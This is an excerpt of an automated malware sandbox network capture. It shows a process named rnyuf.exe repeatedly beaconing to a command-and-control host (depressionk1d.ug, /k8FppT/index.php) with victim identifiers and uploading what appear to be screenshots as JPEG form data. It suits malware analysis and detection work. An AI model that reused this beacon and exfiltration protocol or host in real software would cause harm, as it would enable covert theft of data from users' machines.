                          Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                          Nov 12, 2021 22:23:47.641344070 CET7038OUTData Raw: c9 35 0e b5 35 bb 21 ce 2b a9 95 45 49 34 7e 54 f2 47 9c ec 62 b9 f5 c5 47 5a 27 72 82 8a 5a 28 01 28 a5 a2 80 12 96 97 14 62 80 12 8a 5a 3b d0 02 51 4b 45 31 06 28 a0 52 d1 60 12 8a 5a 50 29 88 4c 52 d1 8a 0d 00 14 51 8a 5a 00 4c 51 8a 5c 51 8a
                          Data Ascii: 55!+EI4~TGbGZ'rZ((bZ;QKE1(R`ZP)LRQZLQ\QaqR@%((4QJ)h1@KEc4SbF(\e.=iamR,.(cq.)hIv(Qv))X.'4sF(Z9ME4\PE6Z)XbQKE%Q`REJ)iCI
                          Nov 12, 2021 22:23:47.663547993 CET7041OUTData Raw: 42 41 c1 e0 f2 2b ca a9 1e 6a 95 17 9a fc 91 ee aa 9e ce 96 1e 76 4e d1 7b ff 00 8e 64 1a 07 87 e1 d2 2d 33 2a c7 2d ec 8c 64 9a 6c 64 ee 3d 81 3c e0 74 1f 9d 2d c7 85 f4 bb 99 fc c6 8a 55 46 90 48 f0 47 33 2c 4e c3 9c b2 03 82 6b 8a 3a ff 00 88
                          Data Ascii: BA+jvN{d-3*-dld=<t-UFHG3,Nk:,v\]Gw$V5g]/'7mB&f\c/gr34"NlbI?Z"0Lt?EWqQ@%PRS(J3@Q
                          Nov 12, 2021 22:23:47.663588047 CET7043OUTData Raw: 7d 09 7c 37 64 c0 4c 62 b2 31 33 74 ce dd a3 35 e6 92 6a be 26 89 ee 12 6b fd 5d 1e db fd 7a bc b2 83 17 38 f9 b2 7e 5e 48 1c f7 35 9d 75 7f 79 7d b7 ed 77 73 dc 6c ce df 3a 42 fb 73 d7 19 fa 54 41 4d 38 b4 f4 45 4a 51 b3 d3 56 6b 26 b7 0b 7d f8
                          Data Ascii: }|7dLb13t5j&k]z8~^H5uy}wsl:BsTAM8EJQVk&}~5^U_TuG`k<"Y0[djXI$cauw>Iz}kv{=20i)Om5!erlyA7qo.C[c?#\|R^Y]
                          Nov 12, 2021 22:23:47.663595915 CET7049OUTData Raw: e7 4f bf 96 7d 42 39 a5 2b 69 2e c9 54 40 01 62 30 14 2f 0d 97 3b b3 9c 0a e7 fc 1d a5 6a 53 2a eb 76 d6 5a 8d f4 5a 6d cc 52 25 ad 94 2d 23 4b 38 cb 26 ed a0 ed 51 b7 96 eb c8 03 ae 47 2e 61 43 da 94 c6 a7 1c 74 aa f6 52 bb 77 df fc ee 43 a9 17
                          Data Ascii: O}B9+i.T@b0/;jS*vZZmR%-#K8&QG.aCtRwCechMw+>y_o\sS5_od.+,i;xQsqRqk^_/6Gc[?rXciNr9,8bH*SqRR;4fb
                          Nov 12, 2021 22:23:47.663631916 CET7054OUTData Raw: 8a 5a 5c 53 24 4c 52 81 4a 05 2e 29 89 b1 b4 62 9f 8a 31 45 85 71 98 a5 c5 3b 14 b8 a7 60 b8 dc 51 b6 9f 8a 5c 53 b0 ae 33 6d 1b 6a 4d b4 6d a7 61 73 11 ed a3 6d 4b 8a 36 d1 ca 1c c4 3b 28 2b 53 ed a4 db 4f 94 39 88 0a d3 4a d5 82 b4 85 2a 79 46
                          Data Ascii: Z\S$LRJ.)b1Eq;`Q\S3mjMmasmK6;(+SO9J*yFV+M)VJJTVI)HVV+L)RZ9ZiiSL"""RM"&0LSIRUE!PwE!Ph7CJ*|lx_BJ:5i1|xss7RM
                          Nov 12, 2021 22:23:47.663655043 CET7057OUTData Raw: 7d a9 0a 66 a7 90 6a a1 9e d1 54 46 2a d3 68 b3 51 18 aa 5d 33 48 d5 33 4c 75 1b 47 c5 69 34 35 13 43 58 ca 99 b4 6a 99 6f 15 40 d1 d6 a3 c5 50 3c 55 cf 3a 67 44 2a 99 a5 71 4c 2b 57 9e 2a 81 d2 b0 94 2c 74 46 77 2a 91 4d c5 4e 56 98 56 b3 71 34
                          Data Ascii: }fjTF*hQ]3H3LuGi45CXjo@P<U:gD*qL+W*,tFw*MNVVq4R#HE&*lUc~)Q`JQI\@($2iZm.+"o7;0ROfT(%(p vi)(!L\PzR8\hC@cMa(sQN,Uzm]GCd@S*t+\
                          Nov 12, 2021 22:23:47.663728952 CET7058OUTData Raw: 06 8d be fa 03 52 e6 d0 29 eb a9 9d b6 8d 80 f6 ad 51 69 6f 2f dc 62 b4 36 95 2f 54 65 6a 9f 6d 1e a6 8a 32 7a a3 24 c0 08 a8 5e d3 22 b5 9a ce 68 fe fc 4d 51 f9 5e d5 4a a4 58 b9 e5 1d cc 29 6c fd ab 3e 7b 2f 6a eb 0d be e1 d2 a0 92 c7 23 ee 9a
                          Data Ascii: R)Qio/b6/Tejm2z$^"hMQ^JX)l>{/j#OFMLIMJtb]i8j:1Tek@,W$DfCt3 ?s)WEpAIo3o)kKXdPt-^6B=yyFxkfy
                          Nov 12, 2021 22:23:47.663753986 CET7061OUTData Raw: e4 77 a7 cd 17 ba 17 2c 96 cc b2 74 b8 4f 47 a6 9d 20 ff 00 0b d3 04 cc 3b d3 d6 e1 c7 43 4e d4 df 41 5e aa ea 44 74 a9 87 4c 1a 89 b4 fb 85 3f 70 d5 f1 76 e3 bd 4a 97 8d de 8f 67 49 ec 1e d6 aa 32 4d ac c3 f8 0f e5 4d 31 38 ea a6 b7 85 da 9e ab
                          Data Ascii: w,tOG ;CNA^DtL?pvJgI2MM18NobvZ?-4Z?A_V}}j=Qvm*[?%')biHm&QQ:u)}JXV>~T)F1Shaq8p+IpH%:S AO
                          Nov 12, 2021 22:23:47.734055042 CET7135INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:23:47 GMT
                          Content-Type: text/html
                          Content-Length: 0
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          X-Powered-By: PHP/5.6.37
                          Nov 12, 2021 22:23:47.752955914 CET7135OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:23:47.778225899 CET7136INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:23:47 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          139192.168.2.449924178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:23:48.120229006 CET7137OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:23:48.146908045 CET7137INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:23:48 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          14192.168.2.449795178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:23:15.834525108 CET2084OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                          Content-Type: multipart/form-data; boundary=----db1a118290543eba3f3170fd42f2b8f5
                          Host: depressionk1d.ug
                          Content-Length: 106671
                          Cache-Control: no-cache
                          Nov 12, 2021 22:23:15.834671974 CET2084OUTData Raw: 2d 2d 2d 2d 2d 2d 64 62 31 61 31 31 38 32 39 30 35 34 33 65 62 61 33 66 33 31 37 30 66 64 34 32 66 32 62 38 66 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                          Data Ascii: ------db1a118290543eba3f3170fd42f2b8f5Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                          Nov 12, 2021 22:23:15.834888935 CET2094OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                          Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                          Nov 12, 2021 22:23:15.835007906 CET2097OUTData Raw: c9 35 0e b5 35 bb 21 ce 2b a9 95 45 49 34 7e 54 f2 47 9c ec 62 b9 f5 c5 47 5a 27 72 82 8a 5a 28 01 28 a5 a2 80 12 96 97 14 62 80 12 8a 5a 3b d0 02 51 4b 45 31 06 28 a0 52 d1 60 12 8a 5a 50 29 88 4c 52 d1 8a 0d 00 14 51 8a 5a 00 4c 51 8a 5c 51 8a
                          Data Ascii: 55!+EI4~TGbGZ'rZ((bZ;QKE1(R`ZP)LRQZLQ\QaqR@%((4QJ)h1@KEc4SbF(\e.=iamR,.(cq.)hIv(Qv))X.'4sF(Z9ME4\PE6Z)XbQKE%Q`REJ)iCI
                          Nov 12, 2021 22:23:15.857228041 CET2102OUTData Raw: 42 41 c1 e0 f2 2b ca a9 1e 6a 95 17 9a fc 91 ee aa 9e ce 96 1e 76 4e d1 7b ff 00 8e 64 1a 07 87 e1 d2 2d 33 2a c7 2d ec 8c 64 9a 6c 64 ee 3d 81 3c e0 74 1f 9d 2d c7 85 f4 bb 99 fc c6 8a 55 46 90 48 f0 47 33 2c 4e c3 9c b2 03 82 6b 8a 3a ff 00 88
                          Data Ascii: BA+jvN{d-3*-dld=<t-UFHG3,Nk:,v\]Gw$V5g]/'7mB&f\c/gr34"NlbI?Z"0Lt?EWqQ@%PRS(J3@Q
                          Nov 12, 2021 22:23:15.857259989 CET2110OUTData Raw: e7 4f bf 96 7d 42 39 a5 2b 69 2e c9 54 40 01 62 30 14 2f 0d 97 3b b3 9c 0a e7 fc 1d a5 6a 53 2a eb 76 d6 5a 8d f4 5a 6d cc 52 25 ad 94 2d 23 4b 38 cb 26 ed a0 ed 51 b7 96 eb c8 03 ae 47 2e 61 43 da 94 c6 a7 1c 74 aa f6 52 bb 77 df fc ee 43 a9 17
                          Data Ascii: O}B9+i.T@b0/;jS*vZZmR%-#K8&QG.aCtRwCechMw+>y_o\sS5_od.+,i;xQsqRqk^_/6Gc[?rXciNr9,8bH*SqRR;4fb
                          Nov 12, 2021 22:23:15.857369900 CET2116OUTData Raw: 55 6d 3a 39 6d 6d 34 c3 76 3c 3b 2c e8 f7 b1 c1 e5 f9 a2 f8 a6 f6 33 7c 99 db f2 e5 bb 71 5c 6d dd e5 c5 fd c9 b8 b9 31 6f 20 28 58 a1 48 91 40 ec 11 00 55 1f 41 4f 1a 96 a2 b6 e6 d9 6e b1 01 b5 36 65 3c b5 ff 00 52 64 f3 4a e7 19 fb fc e7 af 6c
                          Data Ascii: Um:9mm4v<;,3|q\m1o (XH@UAOn6e<RdJl$heJZ.'<-'aU[*S,07EWu.~PskKm\y$/4I(6%f\tw7Vr[bi#@xl z-$Ke8K.#$dT
                          Nov 12, 2021 22:23:15.857422113 CET2122OUTData Raw: 06 8d be fa 03 52 e6 d0 29 eb a9 9d b6 8d 80 f6 ad 51 69 6f 2f dc 62 b4 36 95 2f 54 65 6a 9f 6d 1e a6 8a 32 7a a3 24 c0 08 a8 5e d3 22 b5 9a ce 68 fe fc 4d 51 f9 5e d5 4a a4 58 b9 e5 1d cc 29 6c fd ab 3e 7b 2f 6a eb 0d be e1 d2 a0 92 c7 23 ee 9a
                          Data Ascii: R)Qio/b6/Tejm2z$^"hMQ^JX)l>{/j#OFMLIMJtb]i8j:1Tek@,W$DfCt3 ?s)WEpAIo3o)kKXdPt-^6B=yyFxkfy
                          Nov 12, 2021 22:23:15.879940987 CET2125OUTData Raw: 9a 70 aa 44 b1 f4 52 52 d5 12 38 53 81 a6 0a 75 52 25 a2 50 78 a7 e6 a2 06 9c 0d 5a 64 34 48 0d 3c 1a 88 1e 69 cb 56 99 0d 13 03 4f 06 a1 14 fc d5 a6 66 d1 26 68 06 99 9a 50 6a ae 2b 12 06 a7 87 a8 41 a7 83 4d 32 5a 25 0f ef 4f 0f 50 03 4a 0d 51
                          Data Ascii: pDRR8SuR%PxZd4H<iVOf&hPj+AM2Z%OPJQ%!ETPjpErrMS;u#<zNJy^]67N*h+IlFf!Ua9T]H4k*zp)U4aD{STQ{8VHma=8/lNt.8
                          Nov 12, 2021 22:23:15.880028963 CET2139OUTData Raw: 03 c5 28 3c d3 41 a5 26 98 ac 48 0d 3b 39 a8 f7 52 83 54 89 68 7e 69 41 a6 e6 8a a2 6c 48 0d 3b 35 18 a7 53 4c 96 87 e6 9d 9a 8f 34 a0 fb d5 5c 9b 12 03 4e 06 a2 06 9c 0d 32 5a 25 cd 00 d3 33 4a 1a 98 ac 49 9a 01 a6 73 4f 14 c9 b0 e1 52 2f 15 18
                          Data Ascii: (<A&H;9RTh~iAlH;5SL4\N2Z%3JIsOR/2.iY2,M54h<3<SsLICS3OwFX7TwR'}@;4L$*i<}89iAqBxZvO(n??3!T6PY?G:nf;r
                          Nov 12, 2021 22:23:15.880099058 CET2144OUTData Raw: 37 92 6e 14 6d 93 19 da ca c1 86 47 a6 54 57 95 86 9a 85 68 4a 5b 26 bf 33 aa ac 5b 83 4b b1 f2 86 68 07 34 bb 29 42 1a fb ab 1e 06 82 52 d1 b4 d2 ec 34 f5 10 94 52 ec 34 bb 0d 3b 05 cf b4 09 ac a7 3f e9 32 ff 00 be 7f 9d 69 93 59 2e 7f d2 65 ff
                          Data Ascii: 7nmGTWhJ[&3[Kh4)BR4R4;?2iY.e|:JC`1O:_UG_8P<otRc"z20S{Wzy(h/q3Gk*e(M8BM\MKqkGpEboAm=x:4wk,
                          Nov 12, 2021 22:23:17.368885040 CET2193INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:23:17 GMT
                          Content-Type: text/html
                          Content-Length: 0
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          X-Powered-By: PHP/5.6.37


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          140192.168.2.449925178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:23:49.416085005 CET7138OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:23:49.442693949 CET7138INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:23:49 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          141192.168.2.449926178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:23:49.579570055 CET7139OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:23:49.606867075 CET7139INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:23:49 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          142192.168.2.449927178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:23:49.736486912 CET7140OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                          Content-Type: multipart/form-data; boundary=----db1a118290543eba3f3170fd42f2b8f5
                          Host: depressionk1d.ug
                          Content-Length: 106671
                          Cache-Control: no-cache
                          Nov 12, 2021 22:23:49.736641884 CET7140OUTData Raw: 2d 2d 2d 2d 2d 2d 64 62 31 61 31 31 38 32 39 30 35 34 33 65 62 61 33 66 33 31 37 30 66 64 34 32 66 32 62 38 66 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                          Data Ascii: ------db1a118290543eba3f3170fd42f2b8f5Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                          Nov 12, 2021 22:23:49.736844063 CET7150OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                          Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                          Nov 12, 2021 22:23:49.736985922 CET7153OUTData Raw: c9 35 0e b5 35 bb 21 ce 2b a9 95 45 49 34 7e 54 f2 47 9c ec 62 b9 f5 c5 47 5a 27 72 82 8a 5a 28 01 28 a5 a2 80 12 96 97 14 62 80 12 8a 5a 3b d0 02 51 4b 45 31 06 28 a0 52 d1 60 12 8a 5a 50 29 88 4c 52 d1 8a 0d 00 14 51 8a 5a 00 4c 51 8a 5c 51 8a
                          Data Ascii: 55!+EI4~TGbGZ'rZ((bZ;QKE1(R`ZP)LRQZLQ\QaqR@%((4QJ)h1@KEc4SbF(\e.=iamR,.(cq.)hIv(Qv))X.'4sF(Z9ME4\PE6Z)XbQKE%Q`REJ)iCI
                          Nov 12, 2021 22:23:49.759546041 CET7167OUTData Raw: 42 41 c1 e0 f2 2b ca a9 1e 6a 95 17 9a fc 91 ee aa 9e ce 96 1e 76 4e d1 7b ff 00 8e 64 1a 07 87 e1 d2 2d 33 2a c7 2d ec 8c 64 9a 6c 64 ee 3d 81 3c e0 74 1f 9d 2d c7 85 f4 bb 99 fc c6 8a 55 46 90 48 f0 47 33 2c 4e c3 9c b2 03 82 6b 8a 3a ff 00 88
                          Data Ascii: BA+jvN{d-3*-dld=<t-UFHG3,Nk:,v\]Gw$V5g]/'7mB&f\c/gr34"NlbI?Z"0Lt?EWqQ@%PRS(J3@Q
                          Nov 12, 2021 22:23:49.759576082 CET7172OUTData Raw: 55 6d 3a 39 6d 6d 34 c3 76 3c 3b 2c e8 f7 b1 c1 e5 f9 a2 f8 a6 f6 33 7c 99 db f2 e5 bb 71 5c 6d dd e5 c5 fd c9 b8 b9 31 6f 20 28 58 a1 48 91 40 ec 11 00 55 1f 41 4f 1a 96 a2 b6 e6 d9 6e b1 01 b5 36 65 3c b5 ff 00 52 64 f3 4a e7 19 fb fc e7 af 6c
                          Data Ascii: Um:9mm4v<;,3|q\m1o (XH@UAOn6e<RdJl$heJZ.'<-'aU[*S,07EWu.~PskKm\y$/4I(6%f\tw7Vr[bi#@xl z-$Ke8K.#$dT
                          Nov 12, 2021 22:23:49.759598017 CET7173OUTData Raw: 06 8d be fa 03 52 e6 d0 29 eb a9 9d b6 8d 80 f6 ad 51 69 6f 2f dc 62 b4 36 95 2f 54 65 6a 9f 6d 1e a6 8a 32 7a a3 24 c0 08 a8 5e d3 22 b5 9a ce 68 fe fc 4d 51 f9 5e d5 4a a4 58 b9 e5 1d cc 29 6c fd ab 3e 7b 2f 6a eb 0d be e1 d2 a0 92 c7 23 ee 9a
                          Data Ascii: R)Qio/b6/Tejm2z$^"hMQ^JX)l>{/j#OFMLIMJtb]i8j:1Tek@,W$DfCt3 ?s)WEpAIo3o)kKXdPt-^6B=yyFxkfy
                          Nov 12, 2021 22:23:49.759665012 CET7176OUTData Raw: e4 77 a7 cd 17 ba 17 2c 96 cc b2 74 b8 4f 47 a6 9d 20 ff 00 0b d3 04 cc 3b d3 d6 e1 c7 43 4e d4 df 41 5e aa ea 44 74 a9 87 4c 1a 89 b4 fb 85 3f 70 d5 f1 76 e3 bd 4a 97 8d de 8f 67 49 ec 1e d6 aa 32 4d ac c3 f8 0f e5 4d 31 38 ea a6 b7 85 da 9e ab
                          Data Ascii: w,tOG ;CNA^DtL?pvJgI2MM18NobvZ?-4Z?A_V}}j=Qvm*[?%')biHm&QQ:u)}JXV>~T)F1Shaq8p+IpH%:S AO
                          Nov 12, 2021 22:23:49.759702921 CET7179OUTData Raw: 8c 52 f9 c3 f8 51 45 17 64 ba 9e 45 41 1c a7 a2 13 f8 54 8b 6f 31 fe 1c 7d 6a 73 33 f6 c0 a6 99 1f fb c6 8d 49 e7 6c 05 ab 77 75 1f 8d 3c 5b a0 eb 27 e5 51 ee 3e b4 80 d3 b3 25 dd 96 36 40 a7 ef 13 4e df 0a f4 50 6a b6 68 a3 90 9b 16 85 d0 1f 75
                          Data Ascii: RQEdEATo1}js3Ilwu<['Q>%6@NPjhuU\^#,{~`4#7V'QG${*5<_[W/V.>Cd;1^!gGF=nl5}NPF;m)hV(\$|.<oZO7Z$dW
                          Nov 12, 2021 22:23:49.782138109 CET7182OUTData Raw: 9a 70 aa 44 b1 f4 52 52 d5 12 38 53 81 a6 0a 75 52 25 a2 50 78 a7 e6 a2 06 9c 0d 5a 64 34 48 0d 3c 1a 88 1e 69 cb 56 99 0d 13 03 4f 06 a1 14 fc d5 a6 66 d1 26 68 06 99 9a 50 6a ae 2b 12 06 a7 87 a8 41 a7 83 4d 32 5a 25 0f ef 4f 0f 50 03 4a 0d 51
                          Data Ascii: pDRR8SuR%PxZd4H<iVOf&hPj+AM2Z%OPJQ%!ETPjpErrMS;u#<zNJy^]67N*h+IlFf!Ua9T]H4k*zp)U4aD{STQ{8VHma=8/lNt.8
                          Nov 12, 2021 22:23:49.782165051 CET7185OUTData Raw: 03 c5 28 3c d3 41 a5 26 98 ac 48 0d 3b 39 a8 f7 52 83 54 89 68 7e 69 41 a6 e6 8a a2 6c 48 0d 3b 35 18 a7 53 4c 96 87 e6 9d 9a 8f 34 a0 fb d5 5c 9b 12 03 4e 06 a2 06 9c 0d 32 5a 25 cd 00 d3 33 4a 1a 98 ac 49 9a 01 a6 73 4f 14 c9 b0 e1 52 2f 15 18
                          Data Ascii: (<A&H;9RTh~iAlH;5SL4\N2Z%3JIsOR/2.iY2,M54h<3<SsLICS3OwFX7TwR'}@;4L$*i<}89iAqBxZvO(n??3!T6PY?G:nf;r
                          Nov 12, 2021 22:23:49.831891060 CET7250INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:23:49 GMT
                          Content-Type: text/html
                          Content-Length: 0
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          X-Powered-By: PHP/5.6.37


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          143192.168.2.449928178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:23:49.746018887 CET7153OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:23:49.771595001 CET7179INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:23:49 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          144192.168.2.449929178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:23:49.902368069 CET7251OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:23:49.928647995 CET7251INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:23:49 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          145192.168.2.449930178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:23:50.061553001 CET7252OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
